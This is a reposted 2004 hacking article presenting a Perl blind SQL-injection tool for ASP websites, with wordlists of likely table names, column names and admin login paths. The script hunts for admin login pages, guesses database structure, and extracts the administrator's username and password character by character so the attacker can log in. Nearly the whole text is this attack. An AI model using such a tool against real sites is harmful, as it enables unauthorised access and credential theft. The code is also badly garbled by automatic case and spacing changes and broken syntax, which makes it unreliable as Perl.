ASCC + ASP automatically injects code, you can guess inner

xiaoxiao2021-03-06  78

SQLSCAN.PL

Submitted by Superhei On 2004, July 8, 2:17 Am. My DD

#! / usr / bin / perl

#Codz by black 嘿 black 2004/1/21.

#Thx Mix

$ | = 1;

Use IO :: Socket;

PRINT "=================================================================================================================================================== ======================== / n ";

Print "The SQLFORM-FIND SCRIPT CODZ by Black / N";

Print "Our Team: www.cnse8.com / n";

Print "My Home: XYHACK.91I.NET / N";

PRINT "=================================================================================================================================================== ======================== / n ";

Print "Usage: SQL.EXE 127.0.0.1 80 /test/wenxue/readArticle.asp?id=3 test success / N";

Print "---------------------------------------------- ----------------------- / n ";

IF ($ # argv <1)

IF ($ # argv> 1) {

$ Host = $ argv [0];

$ port = $ argv [1];

$ WAY = $ argv [2];

$ Judge = $ Argv [3];

Open (DB, 'SQLFROM.TXT') || DIE "can't open splfrom.txt."

@Form = ;

Close (DB);

Open (l, 'lines.txt') || DIE "can't open lines.txt."

@lines = ;

Close (L);

Open (lg, 'login.txt') || DIE "can't open login.txt."

@Login = ;

CLOSE (LG);

Foreach $ log (@login) {

CHOMP $ LOG;

@ RES = STR1 ();

Foreach $ check (@res) {

($ HTTP, $ CODE, $ blah) = split (/ /, $ check);

IF ($ code == 200) {

Print "Kaka !! Find the login: http:// $ host $ way1 $ log / n";

}

}

}

Foreach $ sqlfrom (@form) {

CHOMP $ SQLFROM;

$ line = "*";

@ res = Str ();

@ Num = grep / $ judge /, @res;

$ SIZE = @ Num;

IF ($ SIZE> 0) {

Print "/ nkaka !! Find the SQLFROM IS / U / A / A $ SQLFROM / E: / N";

Foreach $ line1 (@lines) {

CHOMP $ LINE1;

$ line = $ line1;

@ res = Str ();

@ Num = grep / $ judge /, @res;

$ SIZE = @ Num;

IF ($ SIZE> 0) {

Print "/ a $ line1 / n";

}

}

}

}

Print "/ a / a / ninput the SQLFORM of Admin! / N $ SQLFORM ="; $ SQLFORM = ; kHomp $ SQLForm;

Print "$ ID ="; $ IDS = ; kHomp $ IDS;

Print "$ usrname ="; $ usrnames = ; kHomp $ usernames;

Print "$ Password ="; $ Passwords = ; kHomp $ Passwords;

Print "/ n / nnow, start to crack! please wait ... / n / n";

#under here is sql words

$ PATH1 = "% 20D% 20Exists (SELECT% 20 $ IDS% 20FROM% 20 $ SQLFORM% 20where% 20 $ IDS =";

$ PATH2 = ")"

$ ID = CRACKINT ();

Print "/ n / nsuccessful, the id of the first admin's ID is / a $ ID ./N";

$ PATH1 = "% 20D% 20exists (SELECT% 20 $ IDS% 20FROM% 20 $ SQLFORM% 20where% 20LEN ($ Passwords) ="

$ PATH2 = "% 20And% 20 $ IDS = $ ID)";

$ len = crackint ();

Print "/ N / NSuccessful, The Len of Admin $ Password IS / A $ LEN ./N/N";

$ PATH1 = "% 20D% 20Exists (SELECT% 20 $ IDS% 20FROM% 20 $ SQLFORM% 20where% 20LEFT ($ Passwords,";

$ PATH2 = ") = '";

$ PATH3 = "'% 20and% 20 $ IDS = ID)"; @password = crackchar ();

Print "/ N / NSuccessful, The Admin's Password IS / A / A @ Password ./n";

$ PATH1 = "% 20D% 20exists (SELECT% 20 $ IDS% 20FROM% 20 $ SQLFORM% 20where% 20LEN ($ usernames) ="

$ PATH2 = "% 20And% 20 $ IDS = $ ID)";

$ len = crackint ();

Print "/ N / NSuccessful, The Len of Admin's Name is $ LEN ./n/n";

$ PATH1 = "% 20D% 20Exists (SELECT% 20 $ IDS% 20FROM% 20 $ SQLFORM% 20where% 20LEFT ($ usrnames,";

$ PATH2 = ") = '";

$ PATH3 = "'% 20And% 20 $ IDS = ID)";

@Username = crackchar ();

Print "/ n / nsuccessful, the admin's username is / a / a @ username ./n/n";

Print "Kaka !! / A / A / You can use / NUSERNAME: @ username / npassword: @ password / nto login test! / r / n";

Sub crackint {

@ DIC = (1..100);

For ($ I = 0; $ i <@dic; $ i )

{

MY $ PATH = $ PATH1. $ DIC [$ I];

MY $ PATH = $ PATH. $ PATH2;

$ REQ = "Get $ WAY $ PATH HTTP / 1.0 / R / N".

"REFERER: http:// $ host $ way / r / n".

"Host: $ Host / N / N";

Print "$ DIC [$ I]."

Sleep (1);

@IN = SOCK ($ REQ);

@n = grep / $ judge /, @IN;

$ SIZE = @ Num;

IF ($ SIZE> 0) {

RETURN $ DIC [$ I];

Last;

}

}

}

Sub crackchar {

MY $ PWS;

My @ DIC11 = (0..9);

my @ DIC12 = (a..z);

My @ DIC13 = (a..z);

MY @ special = QW (`~! @ # $% 25 ^% 26 * / (/) _% 2b = - {} []:"; <> |,. / /);

My @ special2 = qw (`~! · # ¥% ... - * () - - = {} []:"; '"│,. /, <>');

My @dic = (@ DIC11, @ DIC12, @ DIC13, @ Special, @ special2); for ($ j = 1; $ j <= $ g; $ j )

{

For ($ I = 0; $ i <@dic; $ i )

{

MY $ key = $ PWS. $ DIC [$ I];

MY $ PATH = $ PATH1. $ J;

MY $ PATH = $ PATH. $ PATH2;

MY $ PATH = $ PATH. $ key;

MY $ PATH = $ PATH. $ PATH3;

$ REQ = "Get $ WAY $ PATH HTTP / 1.0 / R / N".

"REFERER: http:// $ host $ way / r / n".

"Host: $ Host / N / N";

Print "$ DIC [$ I]."

Sleep (1);

@IN = SOCK ($ REQ);

@n = grep / $ judge /, @IN;

$ SIZE = @ Num;

IF ($ SIZE> 0) {

$ TH = $ j.th;

Print "/ NSuccessful, The $ th Word of The Char IS $ DIC [$ I] / N";

$ PWS = $ PWS. $ DIC [$ I];

Last;

}

}

}

$ PWS = ~ s //% 2b // / ig;

$ PWS = ~ S / /% 25 //% / IG;

$ PWS = ~ s //% 26 // & / ig;

Return $ PWS;

}

SUB STR {

$ PATH = "% 20And% 20exists (SELECT% 20". $ line. "% 20FROM% 20 $ SQLFROM)";

$ REQ = "get $ WAY $ PATH HTTP / 1.0 / N".

"Host: $ Host / N".

"Referr: $ Host / N".

"Cookie: / n / n";

SOCK ($ REQ);

}

SUB str1 {

@ s = split (, $ WAY);

$ S = @ s;

$ s = @ s [$ I-1];

$ D = Length ($ SS);

$ E = Length ($ WAY);

$ WAY1 = Substr ($ WAY, 0, $ E- $ D);

$ REQ = "GET $ WAY1 $ log http / 1.0 / n".

"Host: $ Host / N".

"Referr: $ Host / N".

"Cookie: / n / n";

SOCK ($ REQ);

}

Sub Sock {

MY ($ REQ) = @_;

MY $ Connection = IO :: Socket :: inet-> new (proto => "tcp",

Peeraddr => $ Host,

Peerport => $ port) || DIE "Sorry! Could Not connect to $ host / n";

Print $ Connection $ Req;

My @res = <$ connection>;

CLOSE $ Connection;

Return @res;

}

Sub usage {

Print "/ Ninput The Host Info! / N $ Host ="; $ host = ; kurt $ host; print "$ port ="; $ port = ; kHomp $ port;

Print "$ WAY ="; $ WAY = ; kHomp $ WAY;

Print "/ Input the Judge Words! / N $ JUDGE ="; $ JUDGE = ; kHomp $ Judge;

}

=================== =============================================================================================================================

SQLFROM.TXT:

admin

User

Users

Userinfo

Admin_UserInfo

Password

Adminuser

Manboard

Diaryuseruser

PWD

T_User

user

administrator

Lines.txt:

id

UserID

Username

USR

admin

Name

User

Userpwd

Password

PWD

Passwd

PSWORD

PASS

PWS

PWA

User_id

User_name

User_pass

admin_id

admin_name

Admin_pass

Admin_password

U_ID

U_NAME

U_password

AUID

APWD

Name

password

Login.txt:

Pass.asp

PASSWORD.ASP

Psd.asp

UserName / login.asp

Username / admin.asp

Denglu.asp

Login / admin.asp

Login / login.asp

admin_login.asp

Login_Admin.asp

UserLogin.asp

User.asp

User / login.asp

Admin / admin.asp

Admin / login.asp

admin.asp

Login.htm

admin_login / admin.asp

Login_ADMIN / LOGIN_ADMIN.ASP

Login.asp

AdmPast.asp

admin_login.asp

adminLogin.asp

Managenews / index.htm

Admin / admin_login.asp

Admin_index.asp

Adminn / Index.asp

Admin / AdminLogin.asp

Admin / Default.asp

Manage / login.asp

转载请注明原文地址:https://www.9cbs.com/read-121544.html

New Post(0)